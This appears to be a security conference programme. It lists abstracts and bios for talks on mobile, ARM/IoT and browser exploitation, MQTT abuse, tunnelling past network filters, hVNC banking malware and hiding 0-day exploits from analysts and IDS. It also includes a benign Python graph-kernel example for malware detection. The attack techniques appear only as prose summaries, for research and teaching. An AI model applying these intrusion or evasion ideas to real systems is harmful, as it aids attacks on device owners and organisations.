Mobile apps are among the most preferred ways of delivering attacks today. Understanding the finer details of mobile app attacks is fast becoming an essential skill for penetration testers as well as for app developers and testers.

So, if you are an Android or iOS user, a developer, a security analyst, a mobile pentester or just a mobile security enthusiast, then 'Mobile App Attack' is of definite interest to you. The course familiarizes attendees with in-depth technical explanations of some of the most notorious mobile (Android and iOS) vulnerabilities and ways to verify and exploit them, along with the various Android and iOS application analysis techniques and built-in security schemes, and teaches how to bypass those security models on both platforms.

With live demos using intentionally vulnerable, real-world-style Android and iOS apps crafted by the author, we shall look into some of the common ways in which malicious apps bypass security mechanisms or misuse the permissions they are granted.
Apart from that, we shall take a brief look at what is special about the latest Android 7 and iOS 10 security and the related flaws.

Sneha works as a Security Consultant with Payatu Software Labs LLP. Her areas of interest are web application and mobile application security and fuzzing. She has discovered various serious application flaws in open source applications such as PDFLite, Jobberbase, Lucidchart and many open source WordPress plugins. She is also an active member of Null, the open security community in India, and a contributor to regular meetups at the Pune chapter. She has spoken and provided training at GNUnify, FUDCon, Defcamp#6, Nullcon, BSidesLV and DefCon 24.

The ARM IoT Exploit Laboratory (Three-Day Workshop)

Saumil Shah (Net-Square Solutions Pvt. Ltd.)

NOTE: This is a Three-Day Workshop, starting on the 13th of November, one day earlier than the other trainings.

 

SHORT ABSTRACT:
-------------------

ARM has emerged as the leading architecture in the Internet of Things (IoT) world. The all new ARM IoT Exploit Laboratory is a fast paced 3-day intermediate level class intended for students who want to take their exploit writing skills to the ARM platform. The class covers everything from an introduction to ARM assembly all the way to Return Oriented Programming (ROP) on ARM architectures. Our lab environment features hardware and virtual platforms for exploring exploit writing on ARM based Linux systems and IoT devices.

The class concludes with an end-to-end "Firmware-To-Shell" hack, where we extract the firmware from a popular SoHo router, build a virtual environment to emulate and debug it, and then use the exploit to gain a shell on the actual hardware device.

LEARNING OBJECTIVES:
-------------------
* Introduction to the ARM CPU architecture
* Exploring ARM assembly language
* Understanding how functions work on ARM
* Debugging on ARM systems
* Exploiting Stack Overflows on ARM
* Writing ARM Shellcode from the ground up
* Introduction to Exploit Mitigation Techniques (XN/DEP and ASLR)
* Introduction to Return Oriented Programming
* Bypassing exploit mitigation on ARM using ROP
* Practical ROP chains on ARM
* An introduction to firmware extraction
* Emulating and debugging an IoT device firmware in a virtual environment
* Case Study: From Firmware to Shell - exploiting an ARM router's embedded firmware

TARGET AUDIENCE:
----------------
- Pentesters working on ARM embedded environments. (SoCs, IoT, etc)
- Red Team members, who want to pen-test custom binaries and exploit custom built applications.
- Bug Hunters, who want to write exploits for all the crashes they find.
- Members of military or government cyberwarfare units.
- Members of reverse engineering research teams.
- People frustrated at IoT devices to the point they want to break them!

Saumil Shah is the founder and CEO of Net-Square, providing cutting edge information security services to clients around the globe. Saumil is an internationally recognized speaker and instructor, having regularly presented at conferences like Blackhat, RSA, CanSecWest, PacSec, EUSecWest, Hack.lu, Hack-in-the-box and others. He has authored two books titled "Web Hacking: Attacks and Defense" and "The Anti-Virus Book".

Saumil graduated with an M.S. in Computer Science from Purdue University, USA and a B.E. in Computer Engineering from Gujarat University. He spends his leisure time breaking software, flying kites, traveling around the world and taking pictures.

Social Science First!

Dr. Jessica Barker (Co-Founder, Redacted Firm)

Bruce Schneier popularised the concept in 1999: cyber security is about people, process and technology. Yet almost two decades later, the industry still focuses so much more on technology than the other two dimensions of our discipline. For a long time, when the cyber security community has considered the human nature of cyber security, it has been within the context of a narrative that ‘humans are the weakest link’. In this talk, Dr Jessica Barker will argue that, if that is the case, then that is our failing as an industry. With reference to sociology, psychology and behavioural economics, Jessica will discuss why social science needs to be a greater priority for the cyber security community.

Dr Jessica Barker is a leader in the human nature of cyber security. Equipped with years of experience running her own consultancy, she recently co-founded a new cyber security company, Redacted Firm. Her consultancy experience, technical knowledge and sociology background give her unique insight, and she has a talent for translating technical messages to a non-technical audience.
Jessica delivers thought-provoking and engaging presentations across the world, at corporate events as well as practitioner and academic conferences. She also frequently appears on the BBC, Sky News, Channel 4 News, Channel 5 News, Radio 4’s Today programme, Radio 2’s Jeremy Vine show and more. She has been published in the Sunday Times and the Guardian, and frequently in industry press. She is regularly commissioned to write cyber security blog posts, and runs the website www.cyber.uk, dedicated to cyber security news, information and guidance.

Don't Let The Cuteness Fool You - Exploiting IoT's MQTT Protocol

dalmoz (Moshe Zioni) (VERINT)

"Connect all the things!" - for some time now, this is the main theme when talking about IoT devices, solutions and products. Our eagerness to find new, and at times innovative, ways to make anything suitable to the anthem of the internet is a great promise for malicious activity.

As these devices are supposed to be lightweight, they mostly rely on a small-footprint stack of protocols - one of those protocols is the messaging protocol MQTT.

We will go deep into protocol details, observe how common it is to find such devices (and how), and show several novel ways to abuse any one of the tens of thousands of easily spotted, publicly facing MQTT brokers on the internet for "fun and profit".

Moshe (dalmoz) has been researching security since youth, professionally since he was 18, when he was actually surprised to find a place for his enthusiasm and talent. He is a consultant to many industry leaders, banks, software vendors, insurance companies, health organizations, governments and telecommunication service providers, both domestic and international.
He is interested in all security aspects, keeping his aperture wide and viewing the whole picture, while he can talk the talk and walk the walk when it comes to bits & bytes.
Moshe has published research on various topics and presented at many conferences – including CCC in Germany, Hack-in-Paris in France, 44CON in the UK and others.

Paying the Price for Disruption: How a FinTech Allowed Account Takeover

Vincent Haupert, Tilo Müller, and Dominik Maier (Technical University of Berlin, Friedrich-Alexander University Erlangen-Nürnberg)

In this paper, we look at N26, a pan-European banking startup and the poster child for young FinTechs, to see how security is treated by startups that provide disruptive technologies in the financial sector. We find that, in an area that has been committed to security, FinTechs focus on modern designs and outstanding user experience as their main priority. Even though this strategy is rewarded by a rapidly increasing number of customers, it reveals a flawed understanding of security. We analyzed all aspects of security, including the frontend, backend, protocols, human factors and underlying design concepts, and found issues in all of them. We succeeded in leaking customer data, manipulating transactions, and even entirely taking over foreign accounts, ultimately issuing arbitrary transactions. We reported those findings to N26 and did not disclose them before they had been fixed. Hopefully, by publishing this case study now, we raise awareness of security considerations in the critical banking sector among other FinTech startups as well.

T.B.A.

Next-Gen Mirai

Balthasar Martin & Fabian Bräunlein (SRlabs)

Badly secured embedded devices enabled the largest DDoS attack on critical networks seen to date: The Mirai attacks in 2016 were largely pegged on Internet-exposed telnet with default credentials. While such telnet accounts are hopefully on their way out, we had a look at the next available hacking options to compromise masses of IoT devices.
It turns out that IP cameras can still be compromised remotely in many other ways - even if they are not exposed directly to the internet. In particular, we found issues in communication protocols, control servers and infrastructure design.
This talk details how we found such next-gen Mirai vulnerabilities, and will demonstrate a number of them. After seeing what we saw, you will have little doubt that there will always be a bot army of compromised embedded devices.

Balthasar lives in Berlin where he pursues a Masters in IT-Systems engineering while working at SRLabs. He is fascinated by a world populated by "smart" devices that turn out to be as smart as a slice of bread. After the DDoS on Brian Krebs, he got curious about additional ways to disturb the global Internet matrix.

Fabian studied IT-Systems Engineering at HPI in Potsdam, but was always more curious about taking such systems apart. He now works as a Security Researcher and Consultant at the Berlin-based hacker collective SRLabs. Fabian's previous talks include hacking payment systems at 32c3 and travel systems at HEUREKA.

A Survey On Automated Dynamic Malware Analysis Evasion and Counter-Evasion: PC, Mobile, and Web

Alexei Bulazel & Bulent Yener (Crowdstrike, Rensselaer Polytechnic Institute)

Automated dynamic malware analysis systems are important in combating the proliferation of modern malware. Unfortunately, malware can often easily detect and evade these systems. Competition between malware authors and analysis system developers has pushed each to continually evolve their tactics for countering the other.

In this paper we systematically review i) "fingerprint"-based evasion techniques against automated dynamic malware analysis systems for PC, mobile, and web, ii) evasion detection, iii) evasion mitigation, and iv) evasion "in the wild." We also discuss difficulties in experimental evaluation, highlight future directions in offensive and defensive research, and briefly survey related topics in anti-analysis.

T.B.A.

XFLTReaT: A New Dimension In Tunnelling

Balazs Bucsay (NCC Group)

This presentation will sum up how to do tunnelling with different protocols and will feature different perspectives in detail. For example, companies are fighting hard to block exfiltration from their network: They use http(s) proxies, DLP, IPS technologies to protect their data, but are they protected against tunnelling? There are so many interesting questions to answer for users, abusers, companies and malware researchers. During this presentation we'll show you some mitigation and bypass techniques, which can be used to filter any tunnelling on your network or to bypass misconfigured filters.

Our new tool XFLTReaT is an open-source tunnelling framework that handles all the boring stuff and gives users the capability to take care of only the things that matter. It provides significant improvements over existing tools. From now on there is no need to write a new tunnel for each and every protocol or to deal with interfaces and routing. Any protocol can be converted to a module, which works in a plug-and-play fashion; authentication and encryption can be configured and customised on all traffic, and it is also worth mentioning that the framework was designed to be easy to configure, use and develop.

In case there is a need to send packets over ICMP type 0 or HTTPS TLS v1.2 with a special header, then this can be done in a matter of minutes, instead of developing a new tool from scratch. The potential use (or abuse) cases are plentiful, such as bypassing network restrictions of an ISP, the proxy of a workplace or obtaining Internet connectivity through bypassing captive portals in the middle of the Atlantic Ocean or at an altitude of 33000ft on an airplane.

This framework is not just a tool; it unites different technologies in the field of tunnelling. While we needed to use different tunnels and VPNs for different protocols in the past, like OpenVPN for TCP and UDP, ptunnel for ICMP or iodined for DNS tunnelling, this changes now:

After taking a look at these tools it was easy to see some commonality. All of them are doing the same things; only the means of communication are different. We simplified the whole process and created a framework that is responsible for everything but the communication itself; we rethought the old way of tunnelling and tried to give something new to the community. After the initial setup the framework takes care of everything. With the check functionality we can even find out which module can be used on the network, so there is no need for any low-level packet fu and hassle.

I guarantee that you won’t be disappointed with the tool and the talk, actually you will be an open-source tool richer.

Balazs Bucsay (@xoreipeip) is a Senior Security Consultant at NCC Group in the United Kingdom who does research and penetration testing for various companies. He has presented at many conferences around the world including Honolulu, Atlanta, London, Oslo, Moscow, and Vienna on multiple advanced topics relating to the Linux kernel, NFC and Windows security. Moreover he has multiple certifications (OSCE, OSCP, OSWP, GIAC GPEN) related to penetration testing, exploit writing and other low-level topics; and has degrees in Mathematics and Computer Science. Balazs thinks that sharing knowledge is one of the most important things in life, so he always shares his experience and knowledge with his colleagues and friends. Because of his passion for technology, he starts his second shift in the evenings, right after work to do further research.

Lock, Stock And Two Smoking Apples - XNU Kernel Security

Alex Plaskett & James Loureiro (MWR InfoSecurity)

This talk will aim to cover the research which has been undertaken following on from the Defcon presentation on MWR's platform agnostic kernel fuzzing, to automatically identify critical flaws within Apple macOS.

It was observed that there have been limited attempts to create automated kernel fuzzing solutions for macOS, hence the drive to modify our existing frameworks to support the platform and develop support utility tooling to aid vulnerability research.

This talk will focus on how the researchers approached developing fuzzing automation to test the core subsystems of the XNU kernel and the insights gained. The talk will also highlight architectural differences between other supported platforms which needed to be addressed whilst performing integration into the framework.

The old adage of 'different fuzzers find different bugs' will also be explored, as we look into the effectiveness of using targeted fuzzing for specific components considered most likely to yield vulnerabilities.

An in-memory fuzzer based on a combination of static and dynamic analysis was also constructed to target these components with the aim to achieve greater code coverage, efficiency and to allow attacks on other privileged components within macOS via IPC.

Finally we will discuss the issues discovered by the fuzzers and highlight future improvements which could be made to the tooling going forward to increase coverage and effectiveness.

It is also the aim to release the code developed, to make it easier for other researchers who may wish to develop similar fuzzers and provide additional tooling to the macOS research community to aid in vulnerability hunting. Specifically, we will release python tooling for capture, replay and mutation of macOS IPC based communication, corpus generation and monitoring, together with the existing kernel fuzzer platform integration targeting core kernel subsystems.

Alex is Head of Technical Research at MWR InfoSecurity in the UK. Alex is best known for mobile and embedded vulnerability research and exploitation. Alex has previously presented at Deepsec, TROOPERS16, BlueHat, T2.Fi, Confidence, 44con and SyScan.

James is a senior researcher at MWR InfoSecurity, and has interests in vulnerability research and reverse engineering. James has previously presented on Windows kernel fuzzing at DefCon in 2016 and on Adobe Reader in 2015.

Wiedergänger: Exploiting Unbounded Array Access Vulnerabilities on Linux

Julian Kirsch, Bruno Bierbaumer, Thomas Kittel, Claudia Eckert (Technical University of Munich)

Memory corruptions are still the most prominent venue to attack otherwise secure programs. In order to make exploitation of software bugs more difficult, defenders introduced a vast number of post-corruption security mitigations, such as w⊕x memory, Stack Canaries, and Address Space Layout Randomization (ASLR), to only name a few. In the following, we describe the Wiedergänger-Attack, a new attack vector that reliably allows escalating unbounded array access vulnerabilities occurring in specifically allocated memory regions to full code execution on programs running on i386 / x86_64 Linux.

Wiedergänger-attacks abuse determinism in the Linux ASLR implementation combined with the fact that (even with protection mechanisms such as relro and glibc's pointer mangling enabled) there exist easy-to-hijack, writable (function) pointers in application memory. To discover such pointers, we use taint analysis and backwards slicing at the binary level and calculate an over-approximation of vulnerable instruction sequences.

To show the relevance of Wiedergänger, we exploit one of the discovered instruction sequences to perform an attack on Debian 10 (Buster) by overwriting structures used by the dynamic loader (dl) that are present in any application depending on glibc and the dynamic loader. In order to show generality, we solely focus on data structures dispatched at program shutdown, as this is a point that arguably all applications eventually have to reach. This results in a reliable compromise that effectively bypasses all protection mechanisms deployed on x86_64 / i386 Linux to date.

We believe Wiedergänger to be part of an under-researched type of control flow hijacking attacks targeting internal control structures of the dynamic loader, for which we propose to use the terminology Loader Oriented Programming (LOP).

T.B.A.

Behavior Based Secure And Resilient System Development

Dr. Muhammad Taimoor Khan (Alpen-Adria University, Klagenfurt, Austria)

We introduce a design methodology to develop reliable and secure systems based on their functional and non-functional behaviour. The methodology has 3 independent, but complementary, components that employ novel approaches and techniques in the design of reliable and secure systems.

First, we introduce reliable-and-secure-by-design development of secure applications through stepwise sound refinement of an executable specification, employing deductive synthesis to enforce functional and non-functional (e.g. security and safety) properties of the applications.

Second, we present a run-time security monitor at the middleware level that protects system operation in the field through comparison of the application execution and the application specification execution in real-time; the run-time security monitor can be synthesized from the executable specification.

Finally, based on the specification, we perform a vulnerability analysis for false data injection attacks, which leads to application designs that are resilient to this type of attacks. We demonstrate the methodology through its application to a basic and typical industrial control system example application, describing all the tools used and ARMET, the middleware monitor that constitutes the core component of the methodology.

Muhammad Taimoor Khan is a post-doc assistant at the Institute of Informatics, Alpen-Adria University Klagenfurt. He holds a PhD from the Research Institute for Symbolic Computation (RISC), Johannes Kepler University, Austria (2014) and a Masters in Advanced Distributed Systems from the University of Leicester, UK (2008). Prior to that, he graduated from Islamia University Bahawalpur (2001) in Computer Science. He has won various research awards including best paper award(s). In the last decade, he has been applying formal methods as a powerful tool to assure reliability and security of various software systems, for instance, industrial control systems and computer mathematics based systems, to name a few. He has extensive experience in both the software industry and research institutes. He has been working as a scientist in various premier international research institutes, including INRIA, France and MIT CSAIL, USA; he is jointly working with these institutes now.

How My SVM Nailed Your Malware

Nikhil P. Kulkarni (Independent Security Researcher)

Looking at the Android application industry from a security perspective, it is quite well known that the Android platform is susceptible to malicious applications. With the recent trend of vendors and customers going completely mobile, Android has now become an attack surface for many malicious attacks. Moreover, the mechanisms used for Android malware detection comprise several known methods, and most of these mechanisms are permission based or based on API usage.

But when we dug deeper and analysed them, we also realised that these mechanisms are open to instruction-level obfuscation techniques. Hence, we decided to bring the approach of machine learning to Android malware analysis, using graph kernels. We tried implementing two different graph kernels, namely the Weisfeiler–Lehman graph kernel and the Neighbourhood Hash graph kernel, which can be used to build a mechanism that finds the similarities among binaries while being robust against the obfuscation used.

This project implementation is based on a well known machine learning algorithm, the Support Vector Machine (SVM), for solving the problem of Android malware analysis. The method detects Android malware by efficiently embedding the function call graphs into a feature map. The gamechanger in this concept is the optimal utilization of the SVM algorithm, which proves to be better than other approaches, with a minimal number of false positives and a higher detection rate.

With the help of clean and real malware Android application samples, an explicit classification model was developed. The function call graphs were extracted from the Android applications, and then the linear-time graph kernel based explicit mapping was deployed in order to efficiently map all the call graphs into the explicit feature space. After the above methods were implemented, the SVM algorithm was trained to thoroughly differentiate between the genuine and the malicious applications.
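The pipeline the abstract describes (call graph, explicit Weisfeiler-Lehman feature map, dot-product kernel, feature rows for an SVM) can be illustrated with a small self-contained script. This is an added example written for this page, not code from the talk or its author. The call graphs, the API-category labels (ENTRY, TELEPHONY, SMS, UI, STORAGE, LOCAL) and the function names are constructed toy data; real call graphs would come from a decompiler and the rows would be fed to a linear SVM, which is left out here to keep the block dependency-free.

```python
from collections import Counter
from math import sqrt

# A call graph is a dict mapping a function name to (label, list of callee names).
# Labels are API categories (constructed for this example, not a real taxonomy).
# Because the kernel only sees labels and structure, renaming a function
# (a cheap obfuscation) changes nothing; only which API categories are reached,
# and how, matters.

def wl_features(graph, iterations=1):
    """Explicit Weisfeiler-Lehman feature map of a call graph.

    Returns a Counter keyed by (iteration, label): iteration 0 counts the raw
    node labels, iteration h counts labels that encode each node's label
    together with the sorted labels of its callees from iteration h-1.
    """
    labels = {node: attrs[0] for node, attrs in graph.items()}
    features = Counter((0, lab) for lab in labels.values())
    for h in range(1, iterations + 1):
        new_labels = {}
        for node, (_, callees) in graph.items():
            neighbourhood = ",".join(sorted(labels[c] for c in callees))
            # Concatenating (own label | sorted callee labels) is the WL
            # relabelling step; the string itself serves as the compressed label.
            new_labels[node] = labels[node] + "|" + neighbourhood
        labels = new_labels
        features.update((h, lab) for lab in labels.values())
    return features

def wl_kernel(g1, g2, iterations=1):
    """Kernel value = dot product of the two explicit feature vectors."""
    f1 = wl_features(g1, iterations)
    f2 = wl_features(g2, iterations)
    return sum(count * f2[key] for key, count in f1.items())

def wl_similarity(g1, g2, iterations=1):
    """Cosine-normalised kernel in [0, 1]; 1.0 means identical feature maps."""
    return wl_kernel(g1, g2, iterations) / sqrt(
        wl_kernel(g1, g1, iterations) * wl_kernel(g2, g2, iterations))

def vectorize(graphs, iterations=1):
    """Map several graphs into one shared explicit feature space (dense rows).
    These rows are what a linear SVM would be trained on."""
    maps = [wl_features(g, iterations) for g in graphs]
    vocab = sorted({key for m in maps for key in m})
    return vocab, [[m[key] for key in vocab] for m in maps]

# Constructed toy call graphs (not real samples).
SUSPICIOUS = {
    "main":        ("ENTRY", ["getDeviceId", "sendSms"]),
    "getDeviceId": ("TELEPHONY", []),
    "sendSms":     ("SMS", []),
}
# Same behaviour with obfuscated function names.
RENAMED = {
    "a": ("ENTRY", ["b", "c"]),
    "b": ("TELEPHONY", []),
    "c": ("SMS", []),
}
# Same API reach, but the SMS call is hidden behind a local wrapper function.
WRAPPED = {
    "main":        ("ENTRY", ["getDeviceId", "w1"]),
    "w1":          ("LOCAL", ["sendSms"]),
    "getDeviceId": ("TELEPHONY", []),
    "sendSms":     ("SMS", []),
}
BENIGN = {
    "main":      ("ENTRY", ["loadUi", "readPrefs"]),
    "loadUi":    ("UI", []),
    "readPrefs": ("STORAGE", []),
}

if __name__ == "__main__":
    for name, g in [("renamed", RENAMED), ("wrapped", WRAPPED), ("benign", BENIGN)]:
        print(f"similarity(suspicious, {name}) = {wl_similarity(SUSPICIOUS, g):.3f}")
    vocab, rows = vectorize([SUSPICIOUS, RENAMED, WRAPPED, BENIGN])
    print(len(vocab), "features; first row:", rows[0])
```

With one WL iteration the renamed graph scores 1.0 against the original, the wrapper-obfuscated one still scores high (5 of the shared features survive), and the benign graph shares only the entry-point label. Increasing `iterations` makes the features more structure-specific, which raises precision but also makes the map more sensitive to inserted wrapper functions; that trade-off is the tuning knob when the rows go into the SVM.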

Nikhil P. K. is an Independent Security Researcher and an International Trainer. His areas of interest include Web Application Penetration Testing, Network Forensics and Mobile Application Security. He is currently pursuing extensive research in "Implementing Machine Learning into Security". He has presented his talks at international and national conferences and meetings such as Nuit Du Hack Paris, Cocon International Cyber Policing and Security Conference, DEFCON Bangalore Chapter, Null Open Security Meet Bangalore and Null Open Security Meet Mysore. He is also a Bug Bounty Hunter and has been acknowledged in the Halls of Fame of companies such as Microsoft, Apple, Adobe, Nokia, Engine Yard, AVIRA Antivirus, etc.

Beyond The Spear - What Can Organizations Do To Deal With Spear Phishing

Johnny Deutsch (EY USA)

Spear phishing is commonly characterized as a social engineering attack vector. The issue with these sorts of attacks is that certain organizations tend to tag them as "un-mitigatable", stating that as long as we have employees we will always be vulnerable, and then minimize the amount of investment they put into this. But today's reality is very different when it comes to the range of controls, processes and roles an organization can set in place to control this form of attack.

In our talk, we'll give an overview of the attack itself, first taking the point of view of an attacker. We share what platforms he/she would use to collect the intelligence needed for a successful attack and the infrastructure needed to support such an attack campaign. In addition we will discuss what sort of false pretenses sophisticated attackers take on, and what sets them apart from the not-so-successful attackers.

In the other half of the talk, we will switch to the point of view of the defender. We will discuss the range of controls the market currently offers to detect, monitor, prevent and complicate such an attack vector, and what level of investment these controls normally take from an organization. We will discuss the weight that every control holds within the larger architecture, and since we conduct red team assessments that include social engineering, we will share from our personal attacker experience what works, and what doesn't. We will conclude by talking about the future state of spear phishing and what the controls of the next generation might look like.

Johnny Deutsch is a Senior Manager at the Advanced Security Center, part of the Advisory Services practice of Ernst & Young LLP based out of Houston, Texas. His cutting-edge security team is dedicated to the simulation of advanced cyber-attacks on EY's clients, with the intention of helping EY's clients understand the business risks that can occur.
Johnny comes from the defense industry, and has served for more than seven years as a cyber-warfare intelligence officer at the rank of Captain in the Israeli technological intelligence unit (the Israeli DARPA).

Who Hid My Desktop – Deep Dive Into hVNC

Or Safran & Pavel Asinovsky (IBM Security Trusteer)

For the past decade, financial institutions have increasingly been faced with the problem of malware stealing hefty amounts of money by performing fraudulent fund transfers from their customers' online banking accounts.

Many vendors attempt to solve this issue by developing sophisticated products for classifying or risk scoring each transaction. Often, identifying legitimate account holders is based on detecting whether the transaction is made from the legitimate user’s machine or from an untrusted endpoint.

Going back 10 years, and still today, some checks are based on the IP address and geolocation of the machine performing the transaction, compared with the user's typical whereabouts. To overcome this check, malware authors simply turned the user's machine into a proxy, making the transaction appear to originate from the same IP address.

Device identification became increasingly sophisticated over the years, adding many parameters of the user’s environment to fingerprint trusted devices. But cybercrime is an arms race, and malware developers did not stay behind. To completely disregard device fingerprinting, they have devised their own circumvention technique: hidden VNC (Virtual Network Computing) that enables them to commit the fraudulent transaction from the user’s own machine without ever being noticed.

In this lecture, we will talk about hVNC in general, but also present and demo the specific use case of Gozi’s proprietary hVNC tool which we reversed and broke in our labs. Gozi is one of the most advanced financial crime tools. It is operated by a cybergang and sees constant innovation and upgrades.

In this talk, we will elaborate on the following subjects:

a. What VNC is and its inherently legitimate uses
b. What hVNC is and why it is used in crime
c. Which financial malware families use hVNC
d. Show some of the hVNC dirty tricks and explain them
e. Explain the reversing of Gozi ISFB's hVNC module (architecture & structure)
f. Live Demo [1/2] - execute the hVNC module and present a live session
g. Live Demo [2/2] - seeing the actual fraudster session (the hidden part) - script and demo
h. Provide the audience with detection and mitigation advice

This session is best suited for stakeholders who work in the anti-fraud departments of their organizations, malware researchers, analysts, and cybercrime investigators. The session requires basic understanding of what banking Trojans are, but does not require specific technical knowledge beyond an information security background.

Or Safran has been a malware researcher at IBM Trusteer for three years and holds a Bachelor of Science degree in computer software engineering.

Pavel Asinovsky has been a malware researcher at IBM Trusteer for the last two years. Prior to that Pavel worked as a malware researcher for F5 Networks and as a malware analyst at RSA-EMC. Pavel has wide experience and interest in malware analysis.

Insecurity In Information Technology

Tanya Janca (Canadian Government)

A lot is expected of software developers these days; they are expected to be experts in everything despite very little training.  Throw in the IT security team (often with little-to-no knowledge of how to build software) telling developers what to do and how to do it, and the situation is further strained. This silo-filled, tension-laced situation, coupled with short deadlines and mounting pressure from management, often leads to stress, anxiety and less-than-ideal reactions from developers and security people alike.

This talk will explain how people’s personal insecurities can be brought out by leadership decisions in the way we manage our application security programs, and how this can lead to real-life vulnerabilities in software and other IT products.  This is not a soft talk about “feelings”, this is a talk about creating programs, governance and policies that ensure security throughout the entire SDLC.

No more laying blame and pointing fingers, it’s time to put our egos aside and focus on building high-quality software that is secure. The cause and effect of insecurities and other behavioural influencers, as well as several detailed and specific solutions will be presented that can be implemented at your own place of work, immediately. No more ambiguity or uncertainty from now on, only crystal clear expectations.

Tanya Janca is an application security evangelist, a web application penetration tester and vulnerability assessor, trainer, public speaker, an ethical hacker, the Co-Leader of the OWASP Ottawa chapter, an effective altruist, and has been developing software since the late 90s. She has worn many hats and done many things, including: Web App PenTesting, Technical Training, Custom Apps, Ethical Hacking, COTS, Incident Response, Enterprise Architecture, Project and People Management, and even Tech Support. She is currently helping the Government of Canada to secure their web applications.

How To Hide Your Browser 0-days: Free Offense And Defense Tips Included

Zoltan Balazs (MRG Effitas)

Zero-day exploits targeting browsers are usually very short-lived. These zero-days are actively gathered and analyzed by security researchers. Whenever a new 0-day becomes known by the security industry, protections against the exploit are shared, AV/IDS signatures made, patches deployed, and the precious 0-day loses its value.

For example, when Ahmed Mansoor was targeted by an iOS 0-day exploit (August 2016), Citizen Lab analyzed the 0-day exploit, and Apple patched the vulnerability within days (http://bit.ly/2bm8ueo). Whoever targeted Mansoor lost a precious 0-day exploit worth hundreds of thousands of dollars.

In my research, I propose a solution for law enforcement, 0-day brokers, and advanced attackers to protect their browser exploits. The key step is to establish a key agreement between the exploit server and the victim browser. After a shared key is set up, attackers can encrypt the real exploit with AES. It is recommended to encrypt both the code to trigger the exploit, and the shellcode. This idea was first published by me (http://bit.ly/2mnvfYE), and quickly adopted by exploit kit developers in-the-wild.

During my presentation, I will propose solutions for defenders to analyze these attacks, countermeasures for attackers to further complicate this kind of analysis, and release POC Ruby code which can be integrated into Metasploit. So far, no encrypted browser exploit delivery code is publicly available to test or implement these attacks.
In addition to protecting the 0-day exploits from analysis, my proposed solution is also able to stay under the radar of IDS systems or Next Generation IDS systems (a.k.a. breach detection systems, APT detection systems). This is aligned with the trend that perimeter security is becoming less effective due to mobile devices and the increasing number of encrypted channels.

Zoltan (@zh4ck) is the Chief Technology Officer at MRG Effitas, a company focusing on AV testing. Before MRG Effitas, he had worked as an IT Security expert in the financial industry for 5 years and as a senior IT security consultant at one of the Big Four companies for 2 years. His main areas of expertise are penetration testing, malware analysis, computer forensics and security monitoring. He released the Zombie Browser Tool that has POC malicious browser extensions for Firefox, Chrome and Safari. He is also the developer of the Hardware Firewall Bypass Kernel Driver (HWFWBypass) and the Sandbox tester tool to test malware analysis sandboxes. He has been invited to give presentations worldwide at information security conferences including DEF CON, Hacker Halted USA, Botconf, AusCERT, Nullcon, Hackcon, Shakacon, OHM, Hacktivity and Ethical Hacking.
Zoltan passed OSCE recently, and he is very proud of it.

Repairing The internet With Responsible Disclosures

Victor Gevers (0xDUDE) (GDI.foundation)

In 2016 a non-profit organization, GDI.foundation, operated by volunteers, started reporting vulnerabilities as responsible disclosures (coordinated vulnerability disclosures) and helping victims of ransom attacks worldwide under the name PROJECT366.

As chairman & co-founder of that organization I would like to share the experiences and challenges they have faced so far. In the last 19 years I, Victor Gevers (@0xDUDE), have made over 5,250 security reports without getting in trouble with the law. In this talk, you'll be taken through the experiences of the last 19 years in "how you could report 'bad news'", shown our attempts to report as many vulnerabilities as humanly possible, and told how to deal with those on the other side, the organizations who receive these reports, and the challenges each side faces.

Victor Gevers (also known as 0xDUDE) is a senior security specialist working as innovation manager for the Dutch Government, specialized in network, mobile, and web application security. He performs research on state-of-the-art attack and defense mechanisms, hacking techniques and OSINT. In his free time he is a vulnerability researcher and hunts down weak security implementations. On several occasions he has been pointed out as a true responsible disclosure evangelist, practicing the art for over 19 years and having made over five thousand responsible disclosures world-wide.

Malware Analysis: A Machine Learning Approach

Chiheb Chebbi (TEK-UP University)

Threats are a growing problem for people and organizations across the globe. With millions of malicious programs in the wild it has become hard to detect zero-day attacks and polymorphic viruses. This is why the need for machine learning-based detection arises. A good understanding of malware analysis and machine learning models is vital to ensure taking wise decisions and building a secure environment by being capable of correctly identifying and mitigating such potential threats.

Chiheb Chebbi is an InfoSec enthusiast and Security Researcher with experience in various aspects of Information Security, focusing on investigation of advanced cyber attacks and researching cyber espionage and APT attacks. His core interest lies in "Web Applications security" and "Industrial Control Systems". In 2016 he was included in the Alibaba Security Research Center Hall Of Fame. He gave talks at the 4th Annual BSides Tampa IT Security Conference 2017 Florida USA, Black Hat Europe London 2016, NASA Space Apps Challenge 2015 and 2016, Global Windows Azure Boot camp 2014: Revolutionizing Education using cloud Computing, International Institute of technologies Sfax 2014: Introduction to Cloud Computing, Research Center in Informatics, Multimedia and Digital Data Processing of Sfax 2014: the future of Software industry.

PeopleSoft: Hack The Planet's Universities

Dmitry Yudin (https://erpscan.com)

PeopleSoft Campus Solutions is used in more than 1000 universities worldwide. In this presentation we will show how to use several vulnerabilities to gain access to the entire information system of a university. This means grade fraud, sabotage, access to student information, access to credit cards, bills, payment plans, fees, etc. In this presentation, we'll look at the architecture of PeopleSoft products, its strengths and weaknesses. We show the attack surface and demonstrate a practical attack on the system. We also show how one vulnerability affects a whole family of products, Oracle PeopleSoft, not just PeopleSoft Campus Solutions.

Dmitry Yudin is a security researcher at ERPScan. Exploit developer, bug hunter, Linux fan.

Skip Tracing For Fun And Profit

Rhett Greenhagen (McAfee)

This talk covers skip tracing TTPs and countermeasures in the digital and human domains. The audience will be guided through two real world examples of how a regular citizen can use open source tools, exploits, and social engineering to assist law enforcement and profit. Some examples include phishing websites tailored to a fugitive’s resume, geolocating a target through video game clients, and using social media meta-data to build a pattern of life. As the audience is moved through the process step by step, online and offline countermeasures such as USPS forwarding, false resume writing, and secure communications will also be covered.

Rhett Greenhagen has worked in the NetSec/IC for over a decade. He specializes in open source intelligence, cyber counter-intelligence, profiling, exploitation, malware analysis, and technical research and development. Career highlights include Primary Forensic Investigator for the DoD’s largest data center as well as senior technical positions for multiple defense contracting companies. Rhett is currently working for the Advanced Programs Group at McAfee.

Effective Security Risk Mitigation Strategy For Countering Terrorism - A Case Study On Pakistan

Captain Kaleem Ahmad (R) (Pak Arab Refinery Limited)

The dynamism of terrorism requires a systematic and methodical intelligent strategy for terrorism threat assessment and management. Unwitting weaknesses in approach and deficiencies in scope invite strategic surprise. A thought out assessment, analysis and pro-active security measures coupled with intelligence data help in framing an effective risk mitigation strategy. Measures to mitigate and avoid terrorism risk are reviewed, with a focus on the need for a joined-up global approach, taking into account the threat shifting at all geographical scales, and adopting a sensible risk-informed approach to counter-terrorism resource allocation.


